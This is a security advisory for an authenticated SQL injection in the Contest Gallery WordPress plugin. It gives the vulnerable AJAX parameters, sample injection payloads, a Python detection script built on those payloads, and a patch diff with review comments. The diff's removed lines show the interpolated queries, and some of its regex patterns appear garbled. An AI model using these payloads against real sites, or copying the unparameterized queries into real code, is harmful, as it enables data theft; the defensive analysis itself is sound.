Published: June 29, 2026

CVE-2026-57662: Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 30.0.0 Authenticated (Contributor+) SQL Injection PoC, Patch Analysis & Rule

Severity: Medium (CVSS 6.5)
CWE: 89
Vulnerable Version: 30.0.0
Patched Version: 30.0.1
Disclosed: June 25, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-57662:
An SQL injection vulnerability in the Contest Gallery plugin for WordPress, affecting versions up to and including 30.0.0. The flaw allows authenticated attackers with Contributor-level access or higher to inject SQL into the plugin's queries and potentially extract sensitive database contents.

Root Cause:
The vulnerability resides in the SQL query construction within `cg-prepare-query-data.php`. The `cg1l_get_entry_query_data` function at line 7 interpolates the `$entryId` parameter directly into the SQL string (`"WHERE (id = $entryId …"`) without parameterization. Similarly, `cg1l_build_images_query_data_gzip` at line 88 builds its `WHERE ($collected) …` clause by concatenating each value of `$getRecentIds`, and at line 102 interpolates `$gid` directly (`"WHERE GalleryID = '$gid' …"`). These parameters flow from user input via AJAX requests without sufficient sanitization or prepared statements.

Exploitation:
An attacker authenticates with Contributor-level credentials and sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to the vulnerable AJAX endpoint (likely `cg1l_ajax_frontend_get_data` or similar, as seen in `ajax-functions-frontend.php`). The request parameters that feed `$entryId` and `$gid` (such as `entryId` or `gid`) can then carry SQL payloads; for example, setting `entryId` to `' OR 1=1 --` escapes the intended `id =` comparison. The `getRecentIds` array parameter offers the same opportunity through the loop that concatenates its values.
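A defender-side detection check for the request shape just described, written as an added example (it is not part of the Atomic Edge advisory and not the plugin's code): it inspects parsed `admin-ajax.php` POST bodies and flags the id parameters that the patched plugin coerces with `absint()` whenever they carry anything other than decimal digits. The `cg1l_` action prefix is an assumption generalised from the action name above, the sample request records are constructed, and the payload strings are the ones quoted on this page.

```python
import re
from urllib.parse import parse_qs

# Added example (not Atomic Edge's rule or the plugin's code): flag admin-ajax
# requests to the Contest Gallery frontend handlers whose id parameters are not
# plain integers. The patched plugin runs these values through absint(), so a
# legitimate client never sends anything but decimal digits here.

AJAX_PATH = "/wp-admin/admin-ajax.php"
# Assumption: the plugin's frontend AJAX actions share the "cg1l_" prefix
# (the advisory names cg1l_ajax_frontend_get_data).
ACTION_PREFIX = "cg1l_"
# Parameters the patch coerces with absint() (array parameters arrive as name[]).
INT_PARAMS = frozenset({"entryId", "gid", "cgIds", "getRecentIds"})
DIGITS = re.compile(r"[0-9]+")


def form_params(body):
    """Decode an application/x-www-form-urlencoded body into (name, value)
    pairs, folding PHP array syntax such as cgIds[] or cgIds[0] onto cgIds."""
    pairs = []
    for raw_name, values in parse_qs(body, keep_blank_values=True).items():
        base = raw_name.split("[", 1)[0]
        pairs.extend((base, value) for value in values)
    return pairs


def inspect_request(method, path, body):
    """Return a list of (parameter, value, reason) findings for one request;
    an empty list means the request looks like benign gallery traffic."""
    if method != "POST" or path.split("?", 1)[0] != AJAX_PATH:
        return []
    params = form_params(body)
    action = next((v for n, v in params if n == "action"), "")
    if not action.startswith(ACTION_PREFIX):
        return []  # other plugins' actions never reach the vulnerable query code
    return [
        (name, value, "non-integer value in absint()-coerced parameter")
        for name, value in params
        if name in INT_PARAMS and DIGITS.fullmatch(value) is None
    ]


# Constructed sample traffic: a benign request, two requests carrying the
# payload shapes quoted in this advisory, and an unrelated WordPress action.
SAMPLE_REQUESTS = [
    ("POST", AJAX_PATH, "action=cg1l_ajax_frontend_get_data&gid=12&entryId=345"),
    ("POST", AJAX_PATH, "action=cg1l_ajax_frontend_get_data&gid=12&entryId=1%27+OR+SLEEP%285%29--+-"),
    ("POST", AJAX_PATH, "action=cg1l_ajax_frontend_get_data&gid=12&cgIds%5B%5D=7&cgIds%5B%5D=7+OR+1%3D1"),
    ("POST", AJAX_PATH, "action=heartbeat&entryId=abc"),
]


def scan(requests=SAMPLE_REQUESTS):
    """Run inspect_request over a batch and return {index: findings} for hits only."""
    hits = {}
    for index, (method, path, body) in enumerate(requests):
        findings = inspect_request(method, path, body)
        if findings:
            hits[index] = findings
    return hits


if __name__ == "__main__":
    for index, findings in scan().items():
        for name, value, reason in findings:
            print(f"request {index}: {name}={value!r}: {reason}")
```

The check needs the POST body, which ordinary access logs do not record; feed it from a WAF or audit log that captures request bodies (a ModSecurity audit log, for instance) or run it in a request filter in front of WordPress. Because it keys on the parameter shape rather than on SQL keywords, it also catches encoded or obfuscated variants of the payloads, and it produces no hits on the digit-only values a real gallery page sends.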

Patch Analysis:
The patch introduces parameterized queries using `$wpdb->prepare()` with `%d` placeholders for integer inputs throughout `cg-prepare-query-data.php`. Functions like `cg1l_get_entry_query_data` now use `$wpdb->prepare("SELECT … WHERE id = %d …", $entryId)`. The `cg1l_build_images_query_data_gzip` function uses `array_fill` to generate one `%d` placeholder per id for the `IN` clause and passes the sanitized integer array to `$wpdb->prepare`. Additionally, the patch adds early input validation in many functions using `absint()` and empty checks, and integrates a hash-based access validation in `ajax-functions-frontend.php` to verify request authenticity.

Impact:
Successful exploitation allows an authenticated contributor-level attacker to execute arbitrary SQL queries against the WordPress database. This can lead to extraction of sensitive data such as user credentials, password hashes, session tokens, and private post content. In some configurations, it might enable privilege escalation or further compromise of the site. The CVSS score of 6.5 reflects the high confidentiality impact.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/contest-gallery/ajax/ajax-functions-frontend.php
+++ b/contest-gallery/ajax/ajax-functions-frontend.php
@@ -42,13 +42,23 @@
 			$galleriesIds = [];
 			$hasGalleriesIds = false;

-			if(!empty($_POST['cgIds'])){
-				$galleriesIds = [];
-				foreach ($_POST['cgIds'] as $idToSet){
-					$galleriesIds[] = intval($idToSet);
-				}
+			if(!empty($_POST['cgIds']) && is_array($_POST['cgIds'])){
+				$galleriesIds = cg1l_normalize_positive_int_id_list($_POST['cgIds']);
 				$hasGalleriesIds = true;
 			}
+			$hasGalleriesIds = (!empty($hasGalleriesIds) && !empty($galleriesIds));
+
+			$isGalleriesMainPage = false;
+			if(array_key_exists('isGalleriesMainPage', $_POST)){
+				$isGalleriesMainPage = cg1l_parse_bool_value($_POST['isGalleriesMainPage']);
+			}
+
+			if(array_key_exists('hasGalleriesIds', $_POST)){
+				$hasGalleriesIds = (
+					cg1l_parse_bool_value($_POST['hasGalleriesIds']) &&
+					!empty($galleriesIds)
+				);
+			}

 			$cgFromGalleriesUrl = '';
 			if(!empty($_POST['cg_from_galleries_url'])){
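Review bot: `$hasGalleriesIds` is assigned three times in this hunk (`$hasGalleriesIds = true;`, the recomputation against `!empty($galleriesIds)`, and the block that reads `$_POST['hasGalleriesIds']`), and the last of these lets the client choose the flag's value; the only thing that binds it to the server's view is that the same flag is later fed into the access-hash comparison, so either add a comment here saying so or derive the flag from `$galleriesIds` alone and drop the `$_POST['hasGalleriesIds']` branch. `cg1l_normalize_positive_int_id_list()` and `cg1l_parse_bool_value()` are not part of this diff, so the review assumes they are defined elsewhere in the plugin.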
@@ -81,6 +91,21 @@
 				cg1l_ajax_frontend_response(false, ['message' => $galleryRequestErrorMessage, 'code' => 'cg_invalid_gallery_request']);
 			}

+			$galleriesDataAccessHash = (!empty($_POST['galleriesDataAccessHash'])) ? sanitize_text_field($_POST['galleriesDataAccessHash']) : '';
+			$viewerUserId = (is_user_logged_in()) ? get_current_user_id() : 0;
+			$expectedGalleriesDataAccessHash = cg1l_get_galleries_data_access_hash($shortcode_name,$viewerUserId,$isGalleriesMainPage,$galleriesIds,$hasGalleriesIds);
+			if(
+				empty($galleriesDataAccessHash) ||
+				empty($expectedGalleriesDataAccessHash) ||
+				!hash_equals((string)$expectedGalleriesDataAccessHash, (string)$galleriesDataAccessHash)
+			){
+				cg1l_ajax_frontend_response(false, ['message' => $galleryRequestErrorMessage, 'code' => 'cg_invalid_gallery_request']);
+			}
+
+			if($hasGalleriesIds && $requestedGalleryId !== 9999999 && !in_array($requestedGalleryId, $galleriesIds, true)){
+				cg1l_ajax_frontend_response(false, ['message' => $galleryRequestErrorMessage, 'code' => 'cg_invalid_gallery_request']);
+			}
+
 			$entryId = 0;

 			$frontend_gallery = '';
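Review bot: the access-hash check fails closed (an empty expected hash rejects the request) and uses `hash_equals()`, which is the right comparison; two things to tidy up. The literal `9999999` that exempts a gallery id from the `in_array()` check should be a named constant with a comment explaining what it designates, and the strict `!==` comparison only works if `$requestedGalleryId` was already cast to int above this hunk, which the diff does not show, so verify that cast exists.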
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-comments-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-comments-data.php
@@ -1,6 +1,12 @@
 <?php
 if (!function_exists('cg1l_get_entry_comments_data')) {
     function cg1l_get_entry_comments_data($gid,$entryId) {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();
         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-comments/image-comments-'.$entryId.'.json';
         if(file_exists($jsonFile)) {
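Review bot: coercing `$gid` and `$entryId` with `absint()` before they are concatenated into `$jsonFile` also removes any path-traversal risk in that concatenation, which is worth stating in a comment. The early `return [];` changes what callers receive for invalid ids, so check that callers of `cg1l_get_entry_comments_data()` handle an empty array. The same guard is repeated in the image-data, info-data and stats-data files below; a shared helper would keep the four copies from drifting.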
@@ -185,4 +191,3 @@
         }
     }
 }
-
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-data-for-frontend.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-data-for-frontend.php
@@ -435,11 +435,15 @@
         }

         $fieldMap = [
+            'thumbnail' => 'thumbnail',
             'WpUpload' => 'WpUpload',
             'post_title' => 'post_title',
             'post_name' => 'post_name',
             'post_content' => 'post_content',
             'post_excerpt' => 'post_excerpt',
+            'post_alt' => 'post_alt',
+            'post_caption' => 'post_caption',
+            'post_date' => 'post_date',
             'post_mime_type' => 'post_mime_type',
             'medium' => 'medium',
             'large' => 'large',
@@ -478,6 +482,7 @@

         $normalizedData = $fullData;
         $normalizedData['selectedOrder'] = $selectedOrder;
+        $normalizedData['MultipleFiles'] = $multipleFiles;

         if (empty($selectedFileData['isRealIdSource'])) {
             foreach ($fieldMap as $targetKey => $sourceKey) {
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-image-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-image-data.php
@@ -2,6 +2,12 @@
 if (!function_exists('cg1l_get_entry_main_data')) {
     function cg1l_get_entry_main_data($gid,$entryId)
     {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();

         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-data/image-data-'.$entryId.'.json';
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-info-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-info-data.php
@@ -1,6 +1,12 @@
 <?php
 if (!function_exists('cg1l_get_entry_info_data')) {
     function cg1l_get_entry_info_data($gid,$entryId) {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();
         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-info/image-info-'.$entryId.'.json';
         if(file_exists($jsonFile)) {
@@ -120,4 +126,3 @@
 }


-
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-query-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-query-data.php
@@ -2,13 +2,20 @@
 if (!function_exists('cg1l_get_entry_query_data')) {
     function cg1l_get_entry_query_data($entryId)
     {
+        $entryId = absint($entryId);
+        if (empty($entryId)) {
+            return [];
+        }
+
         global $wpdb;
         $tablename = $wpdb->prefix . "contest_gal1ery";
-        $queryData = $wpdb->get_results(
+        $queryData = $wpdb->get_results($wpdb->prepare(
             "SELECT id, Exif, MultipleFiles
          FROM $tablename
-         WHERE (id = $entryId AND Active = '1' AND Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
-            OR (id = $entryId AND Active = '1' AND MultipleFiles != '')");
+         WHERE id = %d AND Active = '1' AND ((Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
+            OR MultipleFiles != '')",
+            $entryId
+        ));

         $queryDataArray = [];
         if (!empty($queryData)) {
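Review bot: the rewritten clause `id = %d AND Active = '1' AND ((Exif != '' AND Exif != '0' AND Exif IS NOT NULL) OR MultipleFiles != '')` is logically equivalent to the two OR branches it replaces (both shared `id = $entryId AND Active = '1'`), so the refactor is behaviour-preserving. `$tablename` is still interpolated into the format string handed to `$wpdb->prepare()`; it comes from `$wpdb->prefix`, not user input, so this is safe, but on WordPress 6.2 or later the `%i` identifier placeholder would let the table name go through `prepare()` as well.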
@@ -33,6 +40,13 @@
 if (!function_exists('cg1l_build_images_query_data_gzip')) {
     function cg1l_build_images_query_data_gzip($gid, $getDataOnly = false, $getRecentIds = []) {

+        $gid = absint($gid);
+        if(!empty($getRecentIds) && is_array($getRecentIds)){
+            $getRecentIds = array_values(array_unique(array_filter(array_map('absint', $getRecentIds))));
+        }else{
+            $getRecentIds = [];
+        }
+
         $wp_upload_dir = wp_upload_dir();

         $base_dir = $wp_upload_dir['basedir'].'/contest-gallery/gallery-id-'.$gid.'/json/segments';
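Review bot: `$gid` is coerced with `absint()` but, unlike the sibling functions in this patch, there is no `empty($gid)` early return, so a zero or non-numeric gallery id still reaches `$base_dir` (`.../gallery-id-0/json/segments`) and the `GalleryID = %d` query further down; add the same guard. The `array_filter()` in the id-list normalisation silently drops ids that coerce to 0, which is the intended effect but deserves a comment.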
@@ -74,27 +88,24 @@
             $tablename = $wpdb->prefix . "contest_gal1ery";

             if(!empty($getRecentIds)){
-                $collected = '';
-                foreach($getRecentIds as $id) {
-                    if(!$collected){
-                        $collected .= "id = $id";
-                    }else{
-                        $collected .= " OR id = $id";
-                    }
-                }
+                $placeholders = implode(',', array_fill(0, count($getRecentIds), '%d'));
                 $queryData = $wpdb->get_results(
+                    $wpdb->prepare(
                     "SELECT id, Exif, MultipleFiles
          FROM $tablename
-         WHERE (($collected) AND Active = '1' AND Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
-            OR (($collected) AND Active = '1' AND MultipleFiles != '')"
+         WHERE id IN ($placeholders) AND Active = '1' AND ((Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
+            OR MultipleFiles != '')",
+                        $getRecentIds
+                    )
                 );
             }else{
-                $queryData = $wpdb->get_results(
+                $queryData = $wpdb->get_results($wpdb->prepare(
                     "SELECT id, Exif, MultipleFiles
          FROM $tablename
-         WHERE (GalleryID = '$gid' AND Active = '1' AND Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
-            OR (GalleryID = '$gid' AND Active = '1' AND MultipleFiles != '')"
-                );
+         WHERE GalleryID = %d AND Active = '1' AND ((Exif != '' AND Exif != '0' AND Exif IS NOT NULL)
+            OR MultipleFiles != '')",
+                    $gid
+                ));
             }

             $queryDataArray = [];
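Review bot: building `IN (%d,%d,...)` with `array_fill()` and passing `$getRecentIds` as the single second argument relies on `$wpdb->prepare()` accepting its values as one array, which it does; the `IN ()` case with an empty list cannot occur because the branch is guarded by `!empty($getRecentIds)` and the normalisation above already discarded zeros. The `$tablename` interpolation is the same as in the first hunk of this file.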
@@ -160,4 +171,3 @@
         }
     }
 }
-
--- a/contest-gallery/functions/frontend/prepare/cg-prepare-stats-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-stats-data.php
@@ -1,6 +1,12 @@
 <?php
 if (!function_exists('cg1l_get_entry_stats_data')) {
     function cg1l_get_entry_stats_data($gid,$entryId) {
+        $gid = absint($gid);
+        $entryId = absint($entryId);
+        if(empty($gid) || empty($entryId)){
+            return [];
+        }
+
         $wp_upload_dir = wp_upload_dir();
         $jsonFile = $wp_upload_dir['basedir'] . '/contest-gallery/gallery-id-' . $gid . '/json/image-stats/image-stats-'.$entryId.'.json';

--- a/contest-gallery/functions/frontend/prepare/cg-prepare-urls-data.php
+++ b/contest-gallery/functions/frontend/prepare/cg-prepare-urls-data.php
@@ -12,6 +12,11 @@
 }
 if (!function_exists('cg1l_get_entry_urls_data')) {
     function cg1l_get_entry_urls_data($entryId,$recentMainData,$shortcode_name) {
+        $entryId = absint($entryId);
+        if(empty($entryId)){
+            return [];
+        }
+
         $map = cg1l_get_shortcode_entry_url_map();
         if(empty($map[$shortcode_name])){
             return $recentMainData;
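Review bot: this function now returns `[]` for an invalid `$entryId` but `$recentMainData` when the shortcode has no URL map entry, so callers get two different shapes for "nothing to do"; returning `$recentMainData` in both cases (or documenting the distinction) would keep the contract consistent.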
--- a/contest-gallery/functions/general/cg-general-functions.php
+++ b/contest-gallery/functions/general/cg-general-functions.php
@@ -373,6 +373,9 @@
 		$name = preg_replace('/_+/', '_', $name);
         $name = cg_remove_emoji($name);
         return strtolower($name);// mysql statements are caseinsensitive by default*/
+        if(function_exists('cg1l_decode_nested_entities_for_plain_text')){
+	        $name = cg1l_decode_nested_entities_for_plain_text($name);
+        }
         $name = cg_remove_emoji( $name );
         return sanitize_title($name);
 	}
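Review bot: the `function_exists('cg1l_decode_nested_entities_for_plain_text')` guard is unnecessary, since the helper is defined in `convert-values.php` within this same patch; a direct call would surface a load-order mistake instead of silently skipping the decoding step. The three context lines above the insertion end a block comment (`*/`), so the new code is live and runs before `sanitize_title()`.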
--- a/contest-gallery/functions/general/cg-get-version.php
+++ b/contest-gallery/functions/general/cg-get-version.php
@@ -17,7 +17,7 @@
 if(!function_exists('cg_get_version_for_scripts')){
     function cg_get_version_for_scripts () {
         /**###NORMAL###**/
-        return '30.0.0';
+        return '30.0.1';
         /**###NORMAL-END###**/
     }
 }
--- a/contest-gallery/functions/general/convert-values.php
+++ b/contest-gallery/functions/general/convert-values.php
@@ -115,6 +115,40 @@
     }
 }

+if(!function_exists('cg1l_decode_nested_entities_for_plain_text')){
+    function cg1l_decode_nested_entities_for_plain_text($content){
+        $content = cg1l_convert_mixed_value_to_string($content);
+
+        if($content===''){
+            return '';
+        }
+
+        $content = trim($content);
+        $content = str_replace(array('‍','‍','‍'), '', $content);
+        $content = str_replace(html_entity_decode('‍', ENT_QUOTES, 'UTF-8'), '', $content);
+
+        for($i=0;$i<3;$i++){
+            $decoded = html_entity_decode($content, ENT_QUOTES | ENT_HTML5, 'UTF-8');
+            if($decoded===$content){
+                break;
+            }
+            $content = $decoded;
+        }
+
+        if(function_exists('wp_strip_all_tags')){
+            $content = wp_strip_all_tags($content,true);
+        }else{
+            $content = strip_tags($content);
+        }
+
+        $content = preg_replace('/\\/', '', $content);
+        $content = preg_replace('/[x00-x1Fx7F]+/', ' ', $content);
+        $content = preg_replace('/s+/', ' ', $content);
+
+        return trim($content);
+    }
+}
+
 if(!function_exists('cg_stripslashes_recursively')){
     function cg_stripslashes_recursively ($content){
         if(!empty($content)){
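Review bot: as rendered here the three `preg_replace()` patterns `'/\\/'`, `'/[x00-x1Fx7F]+/'` and `'/s+/'` have lost their backslashes: `[x00-x1Fx7F]` is a character class matching the literal letters x, 0, 1, F and 7, and `/s+/` collapses every run of the letter s, which would corrupt titles. The intended patterns are presumably `[\x00-\x1F\x7F]+` and `\s+`; verify against the shipped file, because if the code really reads this way it is a functional bug. The same applies to the `str_replace()` list above it, which shows already-decoded zero-width joiner characters rather than entity strings. The bounded three-iteration decode loop is a sensible cap for nested entities.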
--- a/contest-gallery/index.php
+++ b/contest-gallery/index.php
@@ -2,7 +2,7 @@
 /*
 Plugin Name: Contest Gallery
 Description: Upload form, files, photos and videos upload contest gallery plugin for WordPress. Create upload forms for entries with or without file/image upload. Create user registration form. Create login form. Create responsive galleries and allow to vote for any kind of entries. Sell entries via PayPal or Stripe API. Create or edit images via OpenAI API.
-Version: 30.0.0
+Version: 30.0.1
 Author: Contest Gallery
 Plugin URI: https://www.contest-gallery.com
 Author URI: https://www.contest-gallery.com
--- a/contest-gallery/shortcodes/cg_gallery.php
+++ b/contest-gallery/shortcodes/cg_gallery.php
@@ -17,12 +17,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
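Review bot: replacing `trim()` with `absint()` means a non-numeric `id` or `entry_id` attribute now yields 0 rather than the raw string; that is the right coercion for values that end up in `GalleryID = %d` queries, but the downstream code should treat 0 as "no gallery" rather than querying for it. The identical change is repeated in the four other shortcode files below; consider a shared attribute-parsing helper.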
@@ -46,4 +46,4 @@

     }
 }
-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_ecommerce.php
+++ b/contest-gallery/shortcodes/cg_gallery_ecommerce.php
@@ -21,12 +21,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -54,4 +54,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_no_voting.php
+++ b/contest-gallery/shortcodes/cg_gallery_no_voting.php
@@ -19,12 +19,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -50,4 +50,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_user.php
+++ b/contest-gallery/shortcodes/cg_gallery_user.php
@@ -19,12 +19,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -50,4 +50,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/shortcodes/cg_gallery_winner.php
+++ b/contest-gallery/shortcodes/cg_gallery_winner.php
@@ -19,12 +19,12 @@

 	    $galeryID = 0;
 	    if(!empty($atts['id'])){
-		    $galeryID = trim($atts['id']);
+		    $galeryID = absint($atts['id']);
 	    }

         $entryId = 0;
         if(!empty($atts['entry_id'])){
-            $entryId = $atts['entry_id'];
+            $entryId = absint($atts['entry_id']);
         }

         $frontend_gallery = '';
@@ -53,4 +53,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/templates/landing.php
+++ b/contest-gallery/templates/landing.php
@@ -944,11 +944,59 @@
         echo $HeaderWpPageEntry;

     if(class_exists( 'QM_Plugin' )){
+        $wpScripts = wp_scripts();
+
+        $jqueryCoreSrc = includes_url('js/jquery/jquery.min.js');
+        $jqueryCoreVer = '';
+        if(!empty($wpScripts->registered['jquery-core'])){
+            $jqueryCore = $wpScripts->registered['jquery-core'];
+            $jqueryCoreVer = $jqueryCore->ver;
+            if(!empty($jqueryCore->src)){
+                $jqueryCoreSrc = $jqueryCore->src;
+                if(strpos($jqueryCoreSrc,'http://') !== 0 && strpos($jqueryCoreSrc,'https://') !== 0 && strpos($jqueryCoreSrc,'//') !== 0){
+                    $jqueryCoreSrc = (strpos($jqueryCoreSrc,'/') === 0) ? site_url($jqueryCoreSrc) : includes_url($jqueryCoreSrc);
+                }
+            }
+        }
+        if($jqueryCoreVer !== null && $jqueryCoreVer !== ''){
+            $jqueryCoreSrc = add_query_arg('ver',$jqueryCoreVer,$jqueryCoreSrc);
+        }
+
+        $jqueryMigrateSrc = includes_url('js/jquery/jquery-migrate.min.js');
+        $jqueryMigrateVer = '';
+        if(!empty($wpScripts->registered['jquery-migrate'])){
+            $jqueryMigrate = $wpScripts->registered['jquery-migrate'];
+            $jqueryMigrateVer = $jqueryMigrate->ver;
+            if(!empty($jqueryMigrate->src)){
+                $jqueryMigrateSrc = $jqueryMigrate->src;
+                if(strpos($jqueryMigrateSrc,'http://') !== 0 && strpos($jqueryMigrateSrc,'https://') !== 0 && strpos($jqueryMigrateSrc,'//') !== 0){
+                    $jqueryMigrateSrc = (strpos($jqueryMigrateSrc,'/') === 0) ? site_url($jqueryMigrateSrc) : includes_url($jqueryMigrateSrc);
+                }
+            }
+        }
+        if($jqueryMigrateVer !== null && $jqueryMigrateVer !== ''){
+            $jqueryMigrateSrc = add_query_arg('ver',$jqueryMigrateVer,$jqueryMigrateSrc);
+        }
+
+        $queryMonitorVersion = (defined('QM_VERSION')) ? QM_VERSION : '';
+        $queryMonitorCssSrc = plugins_url('assets/query-monitor.css', WP_PLUGIN_DIR . '/query-monitor/query-monitor.php');
+        $queryMonitorJsSrc = plugins_url('assets/query-monitor.js', WP_PLUGIN_DIR . '/query-monitor/query-monitor.php');
+        if(class_exists('QueryMonitor') && method_exists('QueryMonitor','init')){
+            $queryMonitor = QueryMonitor::init();
+            if(is_object($queryMonitor) && !empty($queryMonitor->file) && method_exists($queryMonitor,'plugin_url')){
+                $queryMonitorCssSrc = $queryMonitor->plugin_url('assets/query-monitor.css');
+                $queryMonitorJsSrc = $queryMonitor->plugin_url('assets/query-monitor.js');
+            }
+        }
+        if($queryMonitorVersion !== ''){
+            $queryMonitorCssSrc = add_query_arg('ver',$queryMonitorVersion,$queryMonitorCssSrc);
+            $queryMonitorJsSrc = add_query_arg('ver',$queryMonitorVersion,$queryMonitorJsSrc);
+        }
         ?>
-        <script type='text/javascript' src='<?php echo get_bloginfo('wpurl'); ?>/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'></script>
-        <script type='text/javascript' src='<?php echo get_bloginfo('wpurl'); ?>/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
-        <link rel='stylesheet' id='query-monitor-css' href='<?php echo get_bloginfo('wpurl'); ?>/wp-content/plugins/query-monitor/assets/query-monitor.css?ver=1673467028' type='text/css' media='all' />
-        <script type='text/javascript' src='<?php echo get_bloginfo('wpurl'); ?>/wp-content/plugins/query-monitor/assets/query-monitor.js?ver=1673467028' id='query-monitor-js'></script>
+        <script type='text/javascript' src='<?php echo esc_url($jqueryCoreSrc); ?>' id='jquery-core-js'></script>
+        <script type='text/javascript' src='<?php echo esc_url($jqueryMigrateSrc); ?>' id='jquery-migrate-js'></script>
+        <link rel='stylesheet' id='query-monitor-css' href='<?php echo esc_url($queryMonitorCssSrc); ?>' type='text/css' media='all' />
+        <script type='text/javascript' src='<?php echo esc_url($queryMonitorJsSrc); ?>' id='query-monitor-js'></script>
         <?php
     }
     ?>
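Review bot: moving from hard-coded `get_bloginfo('wpurl')` paths with fixed `?ver=` strings to the registered script handles and `esc_url()` is the right direction. The version guards `$jqueryCoreVer !== null && $jqueryCoreVer !== ''` do not exclude `false`, which is a legal value for a `_WP_Dependency` version; `add_query_arg()` drops a key whose value is `false`, so nothing breaks, but `!empty()` would express the intent directly. The duplicated blocks for jquery-core and jquery-migrate could be one small helper.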
--- a/contest-gallery/v10/v10-admin/gallery/gallery.php
+++ b/contest-gallery/v10/v10-admin/gallery/gallery.php
@@ -1191,7 +1191,7 @@
                 $PdfPreviewImage = $anotherFirstMultipleFilePdfPreviewImage;
             }
             echo '<a href="'.$sourceOriginalImgShow.'?time='.time().'" target="_blank" title="'.$title.'" alt="'.$title.'">
-                <div class="cg_backend_image cg_backend_image_stage"><img class="cg0degree cg_backend_image_preview" src="'.($PdfPreviewImage.'?time='.time()).'" alt="'.$title.'" ></div></a>';
+                <div class="cg0degree cg_backend_image cg_backend_image_stage"><img class="cg_backend_image_preview" src="'.($PdfPreviewImage.'?time='.time()).'" alt="'.$title.'" ></div></a>';
         }elseif(empty($allWpPostsByWpUploadIdArray[$WpUpload]) && $ImgTypeToShow!='con'){
 			echo '<div class="cg_backend_image_full_size_target_empty" >';
 			echo "</div>";
@@ -1250,7 +1250,7 @@
 			<?php
 		}else{
 			echo '<a href="'.$sourceOriginalImgShow.'?time='.time().'" target="_blank" title="Show full size" alt="Show full size">
-                <div class="cg_backend_image cg_backend_image_stage"><img class="cg'.$rThumbToShow.'degree cg_backend_image_preview" src="'.($imgSrcLargeToShow.'?time='.time()).'" width="'.absint($imgSrcFullWidth).'" height="'.absint($imgSrcFullHeight).'" alt="Show full size" ></div></a>';
+                <div class="cg'.$rThumbToShow.'degree cg_backend_image" style="background: url('.($imgSrcLargeToShow.'?time='.time()).') center center no-repeat;"></div></a>';
 		}
 		echo "</div>";

--- a/contest-gallery/v10/v10-admin/gallery/show-comments.php
+++ b/contest-gallery/v10/v10-admin/gallery/show-comments.php
@@ -445,7 +445,7 @@
 	                <?php
                 }else{
                 echo '<div id="cgVotesImageVisualContent">';
-                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><img class="cg'.$rThumb.'degree" src="'.$imageThumb.'" style="'.$padding.';position: absolute !important;max-width:none !important;" width="'.$WidthThumbPic.'"></a>';
+                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><div class="cg'.$rThumb.'degree cg_backend_image" style="background: url('.$imageThumb.') center center no-repeat;"></div></a>';
